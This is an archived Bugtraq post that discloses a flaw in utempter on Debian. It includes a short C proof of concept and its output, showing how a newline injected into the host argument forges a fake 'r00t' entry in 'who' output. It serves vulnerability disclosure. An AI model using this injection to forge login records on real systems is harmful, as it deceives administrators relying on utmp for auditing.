Home page logo
/

bugtraq logo Bugtraq mailing list archives

utempter allows fake host setting
From: paul.szabo () sydney edu au
Date: Sat, 6 Oct 2012 20:53:02 +1000

Quoting from 
http://bugs.debian.org/689562

  Utempter does not (cannot?) verify the setting of host, so it can easily
  be faked. This may affect any software that depend on utmp correctness.
  
  Demo of the issue:
  
  psz () bari:~$ cat silly.c
  #include <sys/types.h>
  #include <sys/stat.h>
  #include <fcntl.h>
  #include <unistd.h>
  #include <stdio.h>
  int main()
  {
    int i;
    i = open("/dev/ptmx", O_RDWR);
    printf("open ptmx returned %d\n", i);
    dup2(i, 0);
    /* dup2(i, 1); */
    printf("doing utempter add\n");
    system("/usr/lib/utempter/utempter add 'xyz)\nr00t     pts/0        Jan  1 01:02 (xyz.com'");
    printf("checking who\n");
    system("who | grep xyz");
    printf("doing utempter del\n");
    system("/usr/lib/utempter/utempter del");
    printf("checking who\n");
    system("who | grep xyz");
    printf("DONE\n");
  }
  psz () bari:~$ cc silly.c; a.out
  open ptmx returned 3
  doing utempter add
  checking who
  psz      pts/29       Oct  4 11:48 (xyz)
  r00t     pts/0        Jan  1 01:02 (xyz.com)
  doing utempter del
  checking who
  DONE
  psz () bari:~$ 
  
  Please see also:
  http://bugs.debian.org/329156
  http://bugs.debian.org/330907

Cheers, Paul

Paul Szabo   psz () maths usyd edu au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia


  By Date           By Thread  

Current thread:
  • utempter allows fake host setting paul . szabo (Oct 09)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]